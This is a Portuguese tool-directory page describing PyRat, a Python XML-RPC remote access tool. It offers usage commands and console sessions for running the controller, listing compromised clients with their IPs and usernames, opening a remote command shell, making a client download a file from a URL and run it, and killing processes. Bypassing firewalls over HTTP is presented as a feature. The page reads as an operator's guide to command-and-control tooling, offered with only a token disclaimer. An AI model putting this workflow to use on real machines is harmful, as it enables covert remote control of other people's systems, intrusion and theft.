Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
PyRat — PyRat, um RAT feito com python xmlrpc | Kitploit
Ferramentas/GitHubGitHub/anhkgg/pyrat
Pós-ExploraçãoTestes de PenetraçãoComando e ControleRed TeamingFerramenta de Acesso RemotoDesenvolvimento de Payloads
GitHubanhkgg/pyrat

PyRat

PyRat, um RAT feito com python xmlrpc

Ver Repositório
16153há 8 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

PyRat

PyRat, um projeto open-source de RAT (Remote Access Tool) baseado em Python XmlRPC, incluindo cliente e servidor (também chamado de controlador, daqui em diante referido como servidor).

Declaração: o projeto é apenas para intercâmbio técnico, não o utilize para fins comerciais ou ilegais; quaisquer disputas legais decorrentes não têm relação comigo!

  1. Como o XmlRPC é baseado no protocolo http, o PyRat pode ignorar firewalls e se comunicar e controlar de forma mais elegante.
  2. A natureza multiplataforma do Python permite que o cliente PyRat suporte diferentes plataformas como Windows/Linux/Macos; atualmente os testes passaram nas plataformas Windows/Ubuntu/Macos.
  3. Controle e gerenciamento por linha de comando no servidor, com muito estilo.
  4. Atualmente o cliente suporta funções como informações básicas, upload, download, cmdshell, execução de software, encerramento de processos, atualização, desinstalação, etc.

Dependências

  1. python2.7
  2. colorama (servidor)

TODO

  1. Adicionar mais recursos, como operações de arquivos, transferência de arquivos em lote com retomada, área de trabalho remota, captura de tela, operações de contas, etc.
  2. Visualização do servidor
  3. Shell interativo
  4. Túnel criptografado
  5. SSH / SCP
  6. PRs são bem-vindos

Uso básico

Cliente

root@kitploit:~
> python .\pyratcli.py localhost 80

Servidor

root@kitploit:~
> python pyratsvr.py 80
--------------------Python RAT-----------------------
--------------------anhkgg---------------------------
--------------------Copyright (c) 2018---------------

软件仅供技术交流,请勿用于商业及非法用途,如产生法律纠纷与本人无关!

--------------------Task command---------------------
--|(l)ist (a)live (k)ill (s)elect (p)rint (c)mdshell (n)ew (d)ownload (r)unexec (u)pload (t)erminate (q)uit (h)elp|--

cmd >

Quando o cliente fica online, o servidor notifica e define o cliente mais recente como alvo de operação padrão.

root@kitploit:~
cmd >test-3333333 is online.
Auto set target test-3333333

help ou h lista todos os comandos suportados pelo servidor.

root@kitploit:~
cmd >help
(l)ist:     list all clients
(a)live:    list alive clients
(k)ill:     delete client
(s)elect:   select target client
(p)rint:    show current client
(c)mdshell: create a cmdshell, type q to exit cmdshell
(n)ew:      update client version
(d)ownload: let client download a file
(r)unexec:  let client run a exe
(u)pload:   upload a file to client
(t)erminate:terminate process
(q)uit:     quit server

Gerenciamento de clientes

O servidor usa sqlite para armazenar informações básicas dos clientes e informações de tarefas, e os clientes podem ser gerenciados por meio de comandos.

root@kitploit:~
//枚举所有客户端
cmd >l
test-3333333 offline 2018-03-20 22:46:59!
id     | client_id                  | version  | localip              | remoteip             | username             | osversion  | firsttime            | lasttime             | status
10     | test-3333333     | 0.1.0    | 192.168.149.1        | 114.245.47.12        | test            | Windows10.0.16299 | 2018-03-17 12:39:56  | 2018-03-20 22:46:59  | 0
cmd >
//枚举在线客户端
cmd >a
no alive client
//删除客户端数据库记录或者卸载客户端
cmd >k
target cid(or ALL):test-3333333
Do you want to uninstall client?(Y/N)

Quando for necessário controlar um cliente, você precisa selecionar o cliente alvo com select ou s.

root@kitploit:~
cmd >c //想进入cmdshell,提示无目标
Please first set target client by (s)elect command.
cmd >s //设置目标
client_id:test-3333333
Set target client: test-3333333
//查看当前目标
cmd >p
test-3333333

cmdshell

Use cmdshell ou c para entrar no cmdshell; a menos que você digite q, você permanecerá no diretório de operação do cmdshell.

O cmdshell registra o diretório de operação; por exemplo, cd c:; a próxima operação será realizada nesse diretório, implementando um cmdshell semelhante a uma conexão via pipe.

Além disso, se você iniciar processos via cmdshell, alguns processos podem bloquear o retorno das mensagens, portanto não é recomendado; use runexec como alternativa.

root@kitploit:~
cmd >c
RAT-CMD > dir
RAT-CMD > test-3333333 do cmdshell(195) dir True
 驱动器 D 中的卷是 gitrepo
 卷的序列号是 EB2F-5AC0

 D:\PyRat\client 的目录

2018/02/24  09:40    <DIR>          .
2018/02/24  09:40    <DIR>          ..
2018/03/20  22:46             4,919 pyratcli.py
2018/03/20  23:01                28 cmd.log
2018/03/17  12:39             1,322 pyratfc.py
2018/03/17  11:19             2,500 osver.py
2018/03/17  12:39             2,161 pyratfc.pyc
               5 个文件         10,930 字节
               2 个目录 647,836,565,504 可用字节

RAT-CMD > ver
RAT-CMD > test-3333333 do cmdshell(196) ver True

Microsoft Windows [版本 10.0.16299.309]

RAT-CMD > tasklist
RAT-CMD > test-3333333 do cmdshell(197) tasklist True

映像名称                       PID 会话名              会话#       内存使用
========================= ======== ================ =========== ============
System Idle Process              0 Services                   0          8 K
System                           4 Services                   0      3,564 K
smss.exe                       360 Services                   0        412 K
csrss.exe                      492 Services                   0      1,700 K
Calculator.exe               21656 RDP-Tcp#85                 1     56,772 K
RAT-CMD > tasklist |findstr Cal
RAT-CMD > test-3333333 do cmdshell(200) tasklist |findstr Cal True
Calculator.exe               21656 RDP-Tcp#85                 1     51,856 K
RAT-CMD > taskkill /IM Calculator.exe
RAT-CMD > test-3333333 do cmdshell(201) taskkill /IM Calculator.exe True
成功: 给进程 "Calculator.exe" 发送了终止信号,进程的 PID 为 21656。
RAT-CMD > taskkill /PID 21656
RAT-CMD > test-3333333 do cmdshell(202) taskkill /PID 21656 True
成功: 给进程发送了终止信号,进程的 PID 为 21656。

Operações de arquivos

Suporta upload e download de arquivos; o download suporta baixar arquivos da rede e arquivos locais do servidor; por enquanto, apenas upload e download de arquivo único são suportados.

root@kitploit:~
cmd >d
url(type N to download local file):N //选择下载本地文件
local file:db.db
dest path:db.db
cmd >test-3333333 do download(203) local db.db db.db True
download success

cmd >d
url(type N to download local file):https://dl.360safe.com/360/inst.exe //下载网络文件
dest path:inst.exe
cmd >test-3333333 do download(204) net https://dl.360safe.com/360/inst.exe inst.exe True
download success

Executar software

root@kitploit:~
cmd >r
run target:inst.exe
runexec inst.exe

Encerrar processos

root@kitploit:~
cmd > t
Select type(name/pid):name
process name:notepad.exe
cmd >test-3333333 do terminate(212) name notepad.exe True
成功: 给进程 "notepad.exe" 发送了终止信号,进程的 PID 为 25416。

Problemas

  1. Possíveis problemas de codificação encontrados durante os testes

Se o cliente estiver rodando no Linux e o servidor no Windows, o chinês pode apresentar caracteres ilegíveis, pois as duas plataformas usam codificações diferentes; ainda não foi tratado.

Doações

img

Baixar ferramenta